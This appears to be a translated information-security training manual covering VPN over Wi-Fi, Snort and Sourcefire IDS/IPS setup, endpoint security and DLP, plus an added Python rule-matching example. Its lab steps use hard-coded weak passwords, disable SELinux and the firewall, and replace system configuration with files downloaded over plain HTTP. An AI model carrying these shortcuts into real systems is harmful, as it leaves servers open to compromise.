
Then create a group named VPN and add the user vnexperts.net to it to complete this step.

Create a Remote Access Policy so the server acts as a VPN server
- The purpose of this step is to allow a group to establish VPN connections. Right-click Remote Access Policies and choose New Remote Access Policy.

Choose Custom and type a name for the Remote Access Policy.

Click Next; the system asks for the conditions under which a connection is allowed. Click Add, choose Windows-Groups, click Add again and add the group you want to allow to connect to this server over VPN.

Add the VPN group to allow access

Click OK to continue.
- Choose Grant remote access permission, then Next and Finish.

Assign IP addresses to the VPN connections
- Right-click the server and choose Properties
- Switch to the IP tab and choose the option Static address pool
- Click Add and enter the address range for VPN connections; I chose 10.69.69.200 - 10.69.69.250 for the clients connecting to this server over VPN.

Click OK to complete the configuration of the Routing and Remote Access server.

c. Creating the VPN connection from devices connecting over Wi-Fi
- In step 1 you connected successfully to a Wi-Fi network. Without the VPN solution you would simply plug the Access Point into the ADSL modem and every connected client could reach the Internet. That is less secure, because the traffic is encrypted only once, by WPA with AES/TKIP. In this design you could even use WEP to support clients that do not speak WPA, but note that WEP is broken and its key can be recovered from captured traffic in minutes; WEP then only limits who can reach the VPN gateway and protects none of the data.
- In this solution, after joining the Wi-Fi network you must also establish a VPN connection before you can reach the Internet. A packet is then encrypted twice: once by WPA at the link layer and once at the IP layer by PPTP or IPsec. A further caveat: PPTP with MS-CHAPv2 is itself cryptographically weak and its credentials can be cracked from a captured handshake, so the second layer only adds real protection with IPsec (L2TP/IPsec with certificates or a strong pre-shared key) rather than PPTP.

- Create the VPN connection on the Wi-Fi client (done here on Windows XP Professional)
- Start / Control Panel / Network Connections / New Connection Wizard. In the first window click Next to continue.

Choose to use a VPN connection, then click Next to continue.

Select VPN connection

Choose a name for the connection; I use VNEXPERTS.NET

For the VPN server address I enter 192.168.50.1, the address of the VPN server configured above. Click Next to finish.

The VPN connection on the Wi-Fi client is now created.

Connect
- Double-click the connection just created, enter the user vnexperts.net (a member of the VPN group, which is allowed to connect to the VPN server 192.168.50.1) and click Connect.

Authentication in progress

Verify: open the website vnexperts.net; it loads as expected.

In this article I have presented a solution for securing Wi-Fi connections. When a system holds servers with highly sensitive data, many businesses do not dare to deploy wireless at all. By adding a VPN on top of the wireless connections the design can be trusted, because the traffic is encrypted at two layers.

10. Intrusion detection and prevention systems (IDS/IPS)
a. How packets are analysed
When a packet enters a Sourcefire device it is processed in the following steps:

Once the packet has been captured by the Sourcefire device it is:
- decoded by the Decoders component
- passed to the Preprocessors
- compared against the set of Rules in use
- the process produces a database of Events
- the Events can be filtered into different event types
- the generated Events can trigger further actions (alerts, blocking, reports)

Understanding the network traffic analysis process

An event contains:

Note: the Impact Flag combines IPS and RNA information to rate the risk of an attack against its actual target. Flag 1 is the most severe (the target host is known and potentially vulnerable), followed by 2, 3 and 4; Flag 4, an attack on a target unknown to RNA, carries the least risk (the original text repeated "Flag 1" for the lowest level).
Packet processing and decoding

This stage decodes the packet starting at Layer 2 (Ethernet), then the IP header and the transport header.

After decoding, the Sourcefire device runs the Preprocessors (fragment and stream reassembly, protocol normalisation) and compares the result against the rule set.

Events are generated from these stages.

b. Installing and configuring Snort as an IDS/IPS

Prepare install: preparing the operating system, the libraries and the installer packages.
Install: performing the installation and configuring Snort and the related services.
NOTE_1: Boot the Fedora Core 10 virtual machine and revert to the snapshot named Origin. Log in to Fedora as user root with the password yeuemnhieu.
NOTE_2: Read every line carefully; lines starting with "#" are explanatory, lines without "#" are commands.
NOTE_3: Lines in italics are command lines that must be run.
NOTE_4: After logging in or rebooting, set the IP address with:
ifconfig eth0 192.168.0.x/24
route add default gw 192.168.0.1
echo "nameserver 208.67.222.222" > /etc/resolv.conf

If there is no eth0, use eth1 instead.

Prepare Install
Update the OS with:
yum update
(The original wrote "yum install update", which would try to install a package named "update"; "yum update" is the command intended.)
Install the libraries Snort needs:
yum install iptables-devel libpcap libpcap-devel pcre pcre-devel pcre-lib php php-common php-gd php-cli php-mysql flex bison mysql mysql-devel mysql-bench mysql-server gcc gcc-c++
Create the Snort directories:
mkdir /etc/snort
mkdir /etc/snort/log
Copy the installer packages to /root/Desktop. The packages are snort-2.8.5.tar.gz, the snortrules...tar.gz snapshot, base-1.4.4.tar.gz and adodb. If they are already on the Desktop after logging in, nothing more is needed.

Installing Snort
SELinux
SELinux is a kernel-enforced mandatory access control system that confines processes (the original compares it to UAC on Windows, but it is a policy enforced by the kernel, not a privilege prompt). Because the lab runs many commands at once, it disables SELinux on Fedora. Go to System --> Administration --> SELinux Management and disable it, following these steps:
- disable SELinux
- restart the machine
- verify that SELinux is disabled
- set the IP address
In production, keep SELinux enforcing and instead label the Snort and BASE paths correctly; disabling it is a lab shortcut.
Services
Installing Snort requires stopping and starting a few services. The lab stops iptables so that it cannot interfere with the sensor (libpcap captures packets before the netfilter INPUT chain sees them, so in practice the firewall mostly matters for reaching BASE over HTTP; stop it in the lab, but in production open the needed ports instead). The services to handle are:
- stop iptables
- start mysqld
- start httpd
The commands are:
/etc/init.d/iptables stop
/etc/init.d/mysqld restart
/etc/init.d/httpd restart

Install Snort

Extract and install Snort
Install Snort with the following commands:
cd /root/Desktop
tar xzvf snort-2.8.5.tar.gz
cd snort-2.8.5
./configure --with-mysql && make && make install
cd /etc/snort
tar xzvf /root/Desktop/snortrules-snapshot-CURRENT.tar.gz

Configure Snort
Go to /etc/snort/etc and copy all the files up into /etc/snort.
Edit /etc/snort/snort.conf (double-click the file to open it in the text editor):
+ Line 194: set the rule path to /etc/snort/rules
+ Lines 259 and 260: comment them out with a leading # (the free Snort build used here supports only one detection option)
+ Line 829: remove the leading # and set user snort, password snort, database snort, host localhost (this line configures the MySQL account Snort logs with).

Install and configure the MySQL database (my root user has the password 123456)
MySQL configuration commands:
mysql
grant CREATE, INSERT, SELECT, DELETE, UPDATE on snort.* to snort@localhost;
SET PASSWORD FOR snort@localhost=PASSWORD('snort');
grant CREATE, INSERT, SELECT, DELETE, UPDATE on snort.* to root@localhost;
SET PASSWORD FOR root@localhost=PASSWORD('123456');
create database snort;
quit
cd /root/Desktop/snort-2.8.5/schemas
mysql -p < create_mysql snort
When prompted for a password, type 123456 and press Enter.
(The grants are issued before the database exists; MySQL accepts that. Note that the snort account gets only the data privileges it needs and no DROP or GRANT rights, which is the right least-privilege shape for a logging account.)

Install BASE and ADOdb
ADOdb is the database abstraction layer that reads the data out of MySQL; BASE is the web application that displays the data ADOdb fetches.
Installation commands:
cd /var/www/html
tar xzvf /root/Desktop/base-1.4.4.tar.gz
cd /var/www/html/base-1.4.4
tar xzvf /root/Desktop/adodb4991.gz
chown -R apache:apache /var/www/html/base-1.4.4/
/etc/init.d/httpd restart
(The original ran "chmod 777" on the BASE directory, then a bare "chown" with no owner, then separate chown and chgrp commands. The bare chown is not a valid command, and a world-writable web root lets any local user alter the application; giving the directory to the apache user is all BASE needs to write its configuration.)

Configure BASE through the web interface
- Edit /etc/php.ini
+ php.ini is PHP's configuration file. In this lab the default file is broken, so it is deleted and downloaded again:
rm /etc/php.ini -f
cd /etc
wget http://tocbatdat.googlepages.com/php.ini
+ After the download into /etc the file may arrive under a different name, so rename it back to php.ini.
+ Restart the web service:
/etc/init.d/httpd restart
Replacing a system configuration file with one fetched over plain HTTP is a lab shortcut. In a real deployment edit the distribution's php.ini instead: a php.ini from an untrusted source can change include paths, error display and other security-relevant settings.
- Configure BASE
+ In Firefox open http://localhost/base-1.4.4
Step 1: click Continue
Step 2: set the ADOdb path: /var/www/html/base-1.4.4/adodb
Step 3: set the SQL login:
Database: snort
Host: localhost
User: snort
Pass: snort

Step 4: set the administrative user: User: snort; password: snort

Step 5: Create BASE
Step 6: OK (the configuration from steps 1 to 5 is complete)

Run Snort
To test whether Snort works we download an exploit.rules file from my website with the commands below. Note that after the download you must go into the directory and rename the file:
rm /etc/snort/rules/exploit.rules -f
cd /etc/snort/rules
wget http://tocbatdat.googlepages.com/exploit.rules
After the download the file may arrive under a different name, so rename it back to exploit.rules (the original said php.ini here by mistake).
After renaming, run Snort with:
snort -v -c /etc/snort/snort.conf -l /etc/snort/log

5. View and test the results
Open http://localhost/base-1.4.4 in Firefox.
Send a ping with a packet larger than 800 bytes:
ping 192.168.0.1 -s 888
Snort should log an alert for the oversized ICMP packet and BASE should display it.

Troubleshooting
If Snort does not run:
1. Re-read the NOTEs.
2. Re-check steps 1 to 5 of Part II, installing Snort.

11. Installing and configuring the Sourcefire IPS
a. Features of the Sourcefire IPS system
The IPS is designed to detect and prevent attacks and latent information-security threats coming from outside into the DMZ or the server farm of VNPT Hanoi.
The RNA feature supplements the IPS/IDS with a network profile (OS, services, open ports, vulnerabilities, host statistics). Combined with the IPS/IDS, it automatically configures and tunes the rules.
Specific feature requirements for the IPS system at VNPT Hanoi:

No. | Feature | Description
1 | IPS feature protecting the network zones | Detects attacks from outside such as worms, Trojans, buffer overflows, DoS attacks, backdoor attacks, spyware, port scans, VoIP attacks, IPv6 attacks, statistical anomalies, protocol anomalies, P2P attacks, blended threats and zero-day attacks against the service servers. Rules can be defined to block attacks, or automatic tuning can be enabled per service. Produces reports on attacks and security vulnerabilities.
2 | IDS feature detecting attacks for the monitored VLANs | Detects and reports attacks, security risks and vulnerabilities of the servers and services in the monitored VLANs. Detects attacks and security risks originating from users. When an external attack on hosts in a monitored zone occurs, the IPS feature can be enabled on the device to protect those hosts and block attacks from outside into the zones.

3 | Real-time Network Awareness (RNA) | RNA helps detect network security risks through the network profile (OS, services, open ports, vulnerabilities, host statistics). Combined with the IPS/IDS it automatically activates or disables the rules needed to protect the network. Its passive scanning discovers risks without affecting the capacity of the network.
4 | IT policy compliance | Produces alerts on violations of the security policy, for example a dangerous attack in progress or an incident involving a host or a service. Alerts can be delivered by email, SNMP or syslog.

b. Typical deployment model of an IDS/IPS system

Analysis of the typical Sourcefire model
Sourcefire has two product lines: the Sourcefire Defense Center is the central management appliance, and the Sourcefire 3D Sensor is the sensor appliance that provides the IPS/IDS functions. Deployed in a network, a sensor operates either Inline (IPS) or Passive (IDS); it detects attacks and network security risks and, in inline mode, blocks them. The Events from the sensors are forwarded to the central management appliance.

c. Operating principles of the Sourcefire IDS/IPS
General principle

Component diagram and operating principle

The operating principle and the components of a Sourcefire sensor are explained with the following example. A Sourcefire 3D Sensor 3D3500 has 8 Ethernet ports used for sensing.
Interface Sets:
+ These ports are grouped into different Interface Sets. In the figure, three Interface Sets have been created.

+ An Interface Set is created in one of two modes, Passive or Inline (Inline, or Inline with Fail Open).
Detection Engine: performs the monitoring on the Interface Sets (like guards at a gate). In the figure, two Detection Engines have been created and monitor the Interface Sets. There are three types of Detection Engine: IPS, RNA and RUA.
Policy: the policy applied to each type of Detection Engine. An Intrusion Policy applies to an IPS Detection Engine; a Detection Policy applies to RNA.

Diagram explaining the operating principle of the Sourcefire IDS/IPS.

[Document: Information Security Training for ABC, 6/2012]

Step 1: the sensing ports on the Sourcefire 3D Sensor are grouped into Interface Sets. In the model above the Interface Sets are created in Inline mode.
Step 2: on these Interface Sets, Detection Engines are created to perform the monitoring.
Step 3: for the Detection Engines to operate, policies must be built and applied to them.
Step 4: when a Detection Engine blocks traffic or detects a security risk, it generates Events.

d. Setting the management parameters of the Sourcefire devices
Connecting the management cables
On the Sourcefire 3D Sensor the management port is Eth1 on the rear of the appliance. On the Sourcefire DC the management port is likewise Eth1 on the rear. The management cables are clearly labelled and must be prepared before the devices are installed. Also prepare the cables for the sensing ports as in the deployment model above.
Setting the basic parameters of a Sourcefire device
+ Name the device according to the VNPT Hanoi naming plan
+ IP address
+ Administrative password
The factory default IP address is 192.168.45.45; the device is reached through its web interface at https://192.168.45.45 with user admin and password Sourcefire. The first-login screen lets us reset these basic parameters. Change the default admin password at that first login and keep the management port reachable only from the management VLAN: a factory credential on a management interface is the first thing an attacker tries.

e. Upgrading the Sourcefire devices
Sourcefire supports automatic updates, or the administrator can upload an update package downloaded from the Sourcefire support site. (The administrator can ask the distributor to supply these updates; a support-site account is only provided once the customer has attended and been certified on a training course run by Sourcefire.)

f. Configuring the system settings
This is the most general system configuration of a Sourcefire device: IP address, time, license, shutdown/restart. To operate and administer the Sourcefire IPS one must be able to verify that the system information matches the design and to change the system settings to meet the requirements. The administrator and operator of the Sourcefire IPS must monitor, and may change, the following system information:

Information: the general information about the Sourcefire device.

Device name, model, version and IP address. Importantly, it shows which policies are applied to the device. It also lets the administrator change the device name.

License: view and manage the licenses of the Sourcefire device.

Network: lets the administrator view and set the IP address, DNS, proxy and hostname of the Sourcefire device. Every Sourcefire device deployed at VNPT Hanoi has been given an IP address and a device name.

Network Interface: lets the administrator configure the management port.

Process: the administrator can use the Process section to issue commands such as Shutdown, Reboot or Restart of the Sourcefire device.

Remote Management: the administrator sets up centralised management of the Sourcefire devices as described in the design document: the DC1500 manages two 3D3500 sensors. The devices talk to each other using:
+ IP address
+ Port (configured by the administrator)
+ Key (a pre-shared registration key set by the administrator)
The detailed configuration steps are in the deployment document.

Time: sets the device clock. Keep every sensor and the DC synchronised with NTP; event timestamps from different appliances can only be correlated when their clocks agree. There are a few other settings as well, such as NetFlow devices, Storage and Health blacklist.

g. Setting up centralised management of the Sourcefire devices
The Sourcefire solution uses the Sourcefire DC to manage the Sourcefire 3D Sensors. Everything that can be configured on a 3D Sensor can be configured from the DC. At VNPT Hanoi, once centralised management has been set up, all configuration is done on the Sourcefire DC1500.
Sourcefire centralised management model

[Figure: the Mgt_port of the Sourcefire DC1500 and the Mgt_ports of the Sourcefire 3D3500 Sensors connect through a switch in the Management VLAN.]

The Sourcefire DC1500 manages the Sourcefire devices in the system. The Sourcefire 3D Sensors perform the sensing and are managed by the DC1500.
Configuration steps
Centralised management must be configured on both sides, the Sourcefire DC and the Sourcefire 3D Sensor. On the 3D Sensor you specify which DC manages it (IP, port, registration key). On the DC you add the sensor (IP, port, registration key).
On the 3D Sensor
+ Log in to each Sourcefire 3D Sensor and go to Operations > System Settings > Remote Management > Add Manager (the default management port is 8305)
+ Set the IP address of the managing device, the DC1500: 10.10.42.120

+ Set the Registration Key (the shared secret between the devices): vthn123
+ Click Save. Repeat on all three Sourcefire 3D Sensors.
The registration key only has to survive the one-time pairing of sensor and DC, so there is no reason for it to be memorable; in production use a long random value rather than a short string like the one in this lab.

On the Sourcefire DC1000 (the original names the DC1000 here, while elsewhere the managing appliance is the DC1500)
Log in to the DC and go to Operations > Sensors. Enter the IP address of the 3D Sensor in the Host field and the registration key vthn123, then click Add.

Once the management setup is complete, go to Operations > Sensors on the DC1500 to see the managed devices (in this example one DC manages three 3D Sensors).

h. Configuring Interface Sets and Detection Engines
Configuring Interface Sets
An Interface Set is a group of sensing ports on a Sourcefire 3D Sensor. The administrator groups interfaces into an Interface Set. Interface Sets come in these types:
+ Passive: operates as an IDS
+ Inline: operates as an IPS
+ Inline with Fail-Open: operates as an IPS, but if the device fails the network is not interrupted; traffic then passes through the sensor unfiltered, which is a deliberate availability-over-security trade-off.
On the DC1500 go to Operations > Detection Engines > Interface Sets. Choose the name, the type and the Sourcefire 3D Sensor on which to create it.

Configuring Detection Engines
There are three types of Detection Engine: IPS, RNA and RUA. VNPT Hanoi has purchased only the IPS and RNA licenses, so only these two types can be created.
+ IPS Detection Engine: detects and blocks network attacks
+ RNA: builds the Network Profile
+ RUA: detects and maps IP addresses to users
Several Detection Engines of different types can be created on one Interface Set. Detection Engines are the engines that monitor the Interface Sets; the administrator should check that each Detection Engine is applied to the correct Interface Set. Detection Engines can be modified by the administrator.

Interface for changing the Detection Engine applied to the Interface Sets

i. Administering and configuring policies for the IPS
This is a very important part of administering and operating the Sourcefire IPS. All policy configuration for the Detection Engines is done here. The administrator creates security policies; when a policy is violated the system takes the action appropriate to the violation.

The policy administration area has these main sections:
- IPS administration
- RNA administration
- Security (compliance) policy administration

IPS administration
IPS administration covers setting the policy for the Detection Engines, managing the rules, managing SEU updates and a few other features.

Intrusion Policy administration
An Intrusion Policy is the policy applied to one or more Detection Engines. It sets:
+ The policy name
+ The Base Policy applied (three levels: connectivity over security, balanced security and connectivity, security over connectivity). At VNPT Hanoi the balanced level is recommended.
+ Which sensor or Detection Engine the policy applies to and is directly affected by it.
+ How many rules are enabled in the policy and how many are in each mode: alert only (Generate Events) or block and alert (Drop and Generate Events). Drop only takes effect on an inline Detection Engine; on a passive Interface Set a drop rule can do no more than generate the event.
Below is the general information of an Intrusion Policy applied to the DMZ Detection Engine at VNPT Hanoi.

The administrator can set the security level based on the vendor's recommendations, with three levels:
+ (High) Security over Connectivity; (Lower) Connectivity over Security; and (Normal) Balanced Security and Connectivity

The administrator can view and change the Detection Engines governed by this policy. The figure below shows this policy applied to one Detection Engine, the VNPT Hanoi DMZ.

The administrator can tune the variables so that the rules work as effectively as possible, both by changing existing variables and by defining new ones. For example, if the HTTP service also uses port 443, add 443 to HTTP_PORTS. Variables such as HOME_NET, EXTERNAL_NET and the port lists decide which traffic a rule even considers, so an incorrect HOME_NET silently disables a large part of the rule set.

The full Sourcefire rule set contains over 20,000 rules and is updated regularly by importing SEUs automatically from Sourcefire. Each Intrusion Policy applied to each Detection Engine can have a different set of rules enabled or disabled. Beyond the rules enabled and disabled by default, the administrator needs to analyse the actual situation and turn rules on or off to meet the system's security requirements.

When RNA is used to discover the network (active hosts, OS, services, IP, MAC, vulnerabilities), the Sourcefire device can use the results to change the state of the rules, improving processing performance and reducing unimportant events. We can let RNA recommend the rule states.

The policy can also be applied to a specific network range.

The Advanced Settings of an Intrusion Policy are important settings; the administrator must understand the Sourcefire system thoroughly before changing them, to avoid affecting the system. The vendor ships defaults for this section.

Policy Layers allow a policy to have several layers:
+ The default layer recommended by the vendor
+ Layers changed by the user

After a series of changes the administrator must Commit Changes to close and save the Intrusion Policy configuration.

After saving the Intrusion Policy the administrator must Apply it to the Detection Engines, and after applying must check whether the process completed successfully.

SEU
This is the interface for monitoring which SEU is applied to the Intrusion Policy. The administrator can also update the SEU on the Sourcefire device by downloading it from the Sourcefire website and importing it into the device.

Rule Editor
By default Sourcefire ships over 20,000 rules, but the administrator can add new rules to enforce the security policy of their own system. In the Rule Editor the administrator can add rules, view and edit a rule's content with specific settings, and manage the rules.

For example, at VNPT Hanoi a rule was added that disallows pings with packets larger than 800 bytes, because large ping packets can affect the network.
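The rule above, the decode -> preprocessors -> rules -> events pipeline described under "How packets are analysed", and the Snort test with ping -s 888, as one added example that is not part of the original document or of Snort/Sourcefire. It decodes constructed Ethernet/IPv4 frames, parses two Snort-syntax rules (a dsize:>800 ICMP echo rule and a TCP rule, both with hypothetical SIDs), and assigns a simplified impact flag from a constructed RNA-style host map. The frames, rules, addresses and host map are all constructed here; the real products run far richer preprocessors and use vulnerability mappings for the impact flag.

```python
"""Added example (not from the document or the vendor): a miniature decode -> rule match -> event pipeline."""
import ipaddress
import re
import struct

def decode_frame(frame):
    """Ethernet II -> IPv4 -> ICMP/TCP; returns the fields the rules need, else None."""
    if len(frame) < 34 or frame[12:14] != b"\x08\x00":
        return None                                   # not IPv4
    ip = frame[14:]
    l4 = ip[(ip[0] & 0x0F) * 4:struct.unpack("!H", ip[2:4])[0]]   # transport header + data
    pkt = {"src": str(ipaddress.ip_address(ip[12:16])), "dst": str(ipaddress.ip_address(ip[16:20]))}
    if ip[9] == 1:                                    # ICMP: 8-byte echo header, rest is dsize
        pkt.update(proto="icmp", itype=l4[0], sport=None, dport=None, dsize=len(l4) - 8)
    elif ip[9] == 6:                                  # TCP: data offset in byte 12
        sport, dport = struct.unpack("!HH", l4[:4])
        pkt.update(proto="tcp", sport=sport, dport=dport, dsize=len(l4) - (l4[12] >> 4) * 4)
    else:
        return None
    return pkt

RULE_RE = re.compile(r"^(alert|drop|pass)\s+(\w+)\s+(\S+)\s+(\S+)\s*->\s*(\S+)\s+(\S+)\s*\((.*)\)\s*$")

def parse_rule(text):
    """Split a Snort-syntax rule into its header and ';'-separated options."""
    m = RULE_RE.match(text.strip())
    if not m:
        raise ValueError("unsupported rule syntax: " + text)
    action, proto, src, sport, dst, dport, body = m.groups()
    opts = {}
    for opt in filter(str.strip, body.split(";")):
        key, _, val = opt.strip().partition(":")
        opts[key.strip()] = val.strip().strip('"')
    return {"action": action, "proto": proto.lower(), "src": src, "sport": sport,
            "dst": dst, "dport": dport, "opts": opts}

def _num_ok(spec, value):
    """Snort numeric option: '8', '>800', '<64' or '800<>900'."""
    if "<>" in spec:
        lo, hi = (int(x) for x in spec.split("<>"))
        return lo < value < hi
    if spec[0] in "<>":
        return value > int(spec[1:]) if spec[0] == ">" else value < int(spec[1:])
    return value == int(spec)

def rule_matches(rule, pkt):
    """Header first (proto, CIDR addresses, ports), then the itype/dsize options."""
    if rule["proto"] not in ("ip", pkt["proto"]):
        return False
    for spec, addr in ((rule["src"], pkt["src"]), (rule["dst"], pkt["dst"])):
        if spec != "any" and ipaddress.ip_address(addr) not in ipaddress.ip_network(spec, strict=False):
            return False
    for spec, port in ((rule["sport"], pkt["sport"]), (rule["dport"], pkt["dport"])):
        if spec != "any" and port != int(spec):
            return False
    opts = rule["opts"]
    if "itype" in opts and not _num_ok(opts["itype"], pkt.get("itype", -1)):
        return False
    return "dsize" not in opts or _num_ok(opts["dsize"], pkt["dsize"])

def impact_flag(pkt, host_map):
    """Simplified IPS+RNA impact flag: 1 target known and listening on the attacked port,
    2 target known but no port to correlate (ICMP), 3 target known and port closed, 4 target unknown."""
    host = host_map.get(pkt["dst"])
    if host is None:
        return 4
    if pkt["dport"] is None:
        return 2
    return 1 if pkt["dport"] in host["services"] else 3

def run_pipeline(frames, rules, host_map):
    """Decoder -> rules -> events (the preprocessor stage is omitted here)."""
    events = []
    for pkt in filter(None, map(decode_frame, frames)):
        for rule in rules:
            if rule_matches(rule, pkt):
                events.append({"sid": int(rule["opts"].get("sid", 0)), "msg": rule["opts"].get("msg", ""),
                               "action": rule["action"], "src": pkt["src"], "dst": pkt["dst"],
                               "impact": impact_flag(pkt, host_map)})
    return events

# Constructed traffic: Ethernet II + IPv4 with zeroed checksums (the decoder does not verify them).
def build_frame(src, dst, proto, l4):
    ip_hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(l4), 0, 0, 64, proto, 0,
                         ipaddress.ip_address(src).packed, ipaddress.ip_address(dst).packed)
    return b"\x00" * 12 + b"\x08\x00" + ip_hdr + l4

def icmp_echo(payload_len):            # type 8 (echo request), code 0, id 1, seq 1
    return struct.pack("!BBHHH", 8, 0, 0, 1, 1) + b"A" * payload_len
def tcp_syn(sport, dport):             # 20-byte header, SYN set, no payload
    return struct.pack("!HHIIBBHHH", sport, dport, 0, 0, 5 << 4, 0x02, 8192, 0, 0)

RULES = [parse_rule(r) for r in (
    'alert icmp any any -> any any (msg:"ICMP echo request larger than 800 bytes"; itype:8; dsize:>800; sid:1000001; rev:1;)',
    'alert tcp any any -> 192.168.0.0/24 80 (msg:"Inbound HTTP to DMZ host"; sid:1000002; rev:1;)')]
HOST_MAP = {"192.168.0.10": {"os": "Linux", "services": {22: "ssh", 80: "http"}}}   # constructed RNA-style map
FRAMES = [build_frame("192.168.0.5", "192.168.0.1", 1, icmp_echo(888)),    # ping -s 888
          build_frame("192.168.0.5", "192.168.0.1", 1, icmp_echo(56)),     # ordinary ping, below threshold
          build_frame("10.0.0.9", "192.168.0.10", 6, tcp_syn(40000, 80))]  # SYN to a known web host

def demo():
    return run_pipeline(FRAMES, RULES, HOST_MAP)
```

Running demo() yields two events: the 888-byte echo request matches the dsize rule but its target is not in the host map (impact 4), while the SYN to 192.168.0.10:80 matches the TCP rule against a host known to listen on that port (impact 1). The 56-byte ping produces nothing, which is the point of the threshold.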

Email alert
When a rule matches, the Sourcefire device can send an alert to the administrator, using either the Email Alert feature or a Compliance Policy.

RNA administration
RNA is an advanced Sourcefire feature that discovers the network by passive scanning, running 24/7. To administer RNA we need to configure the following sections:

Detection Policy
A Detection Policy is the policy applied to the RNA Detection Engines. The administrator must create this policy and apply it to the RNA Detection Engines in order to discover the network.
Administration interface for the Detection Engines

The administrator can tune an RNA Detection Engine through its Detection Policy. Below is the administration interface with the settings made during the Sourcefire deployment.

Host Attributes are assigned to a network zone; at VNPT Hanoi the zone is named VNPT Ha Noi and combined with the Network Map, an RNA feature.
Network Map
The Network Map gives the administrator a view of the network with:
+ Active hosts, grouped by network range
+ OS: details of the operating system

+ Services running on the host
+ Applications
+ Protocols in use
+ And the security vulnerabilities of the system
This is the Sourcefire administration interface showing the RNA Network Map entry for the IP address 172.29.1.18.

RNA Detector
The administrator can enable or disable the individual RNA detectors.
Services running in the network
The administrator can open RNA Services to see which services the network is running and on which hosts each service is active.

Service details

Details of the HTTP service with vendor YTS

Managing the applications running on the network
The administrator can use RNA Applications to check which applications are active in the network.

Administration information for the applications in the system

j. Analysing IPS events
Intrusion Event views are designed and described in detail in the Report design document. Intrusion Events cover all IPS events; the administrator can track the number of events:
+ by time
+ by Detection Engine
+ filtered by many other criteria

The administrator can filter for the events of interest.

12. Endpoint Security
a. The Kaspersky Open Space Security (KOSS) solution
Model of the Kaspersky Open Space Security solution

[Figure: KOSS components: Kaspersky for Mail Server, Kaspersky for Internet Gateway, Endpoint Security for File Server, Endpoint Security for Workstation]

The KOSS solution uses Kaspersky Security Center (KSC) to centrally manage all the security packages in the solution. KSC supports hierarchical management to fit any network model:

[Figure: KSC hierarchy: a Kaspersky Security Center MASTER above Kaspersky Security Center SLAVE servers, each managing Kaspersky Endpoint Security clients]

b. Features of the Kaspersky Endpoint Security package
The Kaspersky Endpoint Security package for workstations and servers has the following features:

Control components:
- Application Startup Control
- Application Privilege Control
- Vulnerability Monitor
- Device Control
- Web Control

Protection components:
- General Protection Settings
- File Anti-Virus
- Mail Anti-Virus
- Web Anti-Virus
- IM Anti-Virus
- System Watcher
- Firewall
- Network Attack Blocker

c. Lab: installing KSC and Endpoint Security on workstations

13. Data Loss Prevention
DLP is a solution against leakage of internal information and comprises a set of measures:
- Application control
- Hardware device control (USB, CD-ROM, ...)
- Data management
- Data encryption
- Monitoring and logging of data access

Below I present a DLP solution from Symantec:
DLP is becoming ever more important because organisations today are very much focused on building security measures around their critical information. To help customers protect sensitive data more effectively, Symantec's open DLP platform lets them exploit the content-aware

capabilities of an enterprise-wide security deployment while taking the important steps to secure that data and prevent its loss. Symantec Data Loss Prevention 10 lets enterprises apply content-based encryption and enterprise rights management (ERM) and integrates easily with other Symantec solutions.
Content-based encryption and ERM
The new FlexResponse feature of Symantec Data Loss Prevention 10 helps an enterprise security team apply policy-based protection, including encryption or ERM, to files that contain sensitive data. Today, combining DLP with other IT solutions has to be done by hand. Through partnerships with leading third-party vendors such as GigaTrust, Liquid Machines, Oracle and PGP Corporation, Symantec offers customers a variety of integrated protection options. For example, a company that allows only a few people to access information about a merger agreement can easily apply its DLP policy to classify the data and use Microsoft Active Directory Rights Management Services (AD RMS) to apply ERM to copies of that data, giving very effective protection.
Making DLP intelligence more widely available
New support for XML and web services lets Symantec Data Loss Prevention 10 send DLP data to any application or reporting system, including enterprise security dashboards and compliance solutions such as the Symantec Control Compliance Suite. For example, an e-commerce site could start by using DLP to identify the servers that hold data subject to PCI DSS. By sending this information to Symantec Control Compliance Suite, those servers can be prioritised for more frequent checks, giving closer control of the areas where sensitive data is stored. New policy import/export features let organisations keep their policies up to date with new regulations and exchange policies with other users to share best practice.

Seamless integration with other Symantec solutions
New integration with Symantec Workflow lets DLP 10 users execute policy-driven tasks such as locking an endpoint or encrypting automatically with Symantec Endpoint Encryption, Symantec Endpoint Protection and other security solutions from Symantec and other vendors. For example, if an employee tries to copy confidential information to a USB drive, Symantec Data Loss Prevention can instruct Symantec Endpoint Protection to lock the USB port in a single action. Users of SaaS (software-as-a-service) email security such as MessageLabs Hosted Email Encryption (a hosted Symantec service) can also monitor, protect and securely transmit confidential information in outbound email without running their own email infrastructure.
Services, languages and availability
Symantec Data Loss Prevention services help customers deploy DLP successfully and gain the knowledge and experience to keep optimising the solution over time. Combined with consulting services and other leading data loss prevention technology, Symantec gives customers an in-depth analysis of their risk of information leakage inside and outside the enterprise and a quantitative assessment of the volume of data actually moving across the network, stored in web applications and held on endpoints. Symantec Data Loss Prevention 10 also offers policies and search support in 25 languages, with full localisation in Japanese, Simplified Chinese and French, so users of these languages can create policies, manage and handle incidents and administer the system comprehensively.

14. Network Access Control
To ensure that users connecting to the network do not attempt to attack it, there must be a process of checking, assessment and remediation. For example, a visitor to your company connects to the Wi-Fi; by default the visitor cannot enter the internal network. To reach the internal network the client must pass a series of

Page | 151 Copyright by Tocbatdat

[TL: o to v An ton thng tin cho ABC

6, 2012

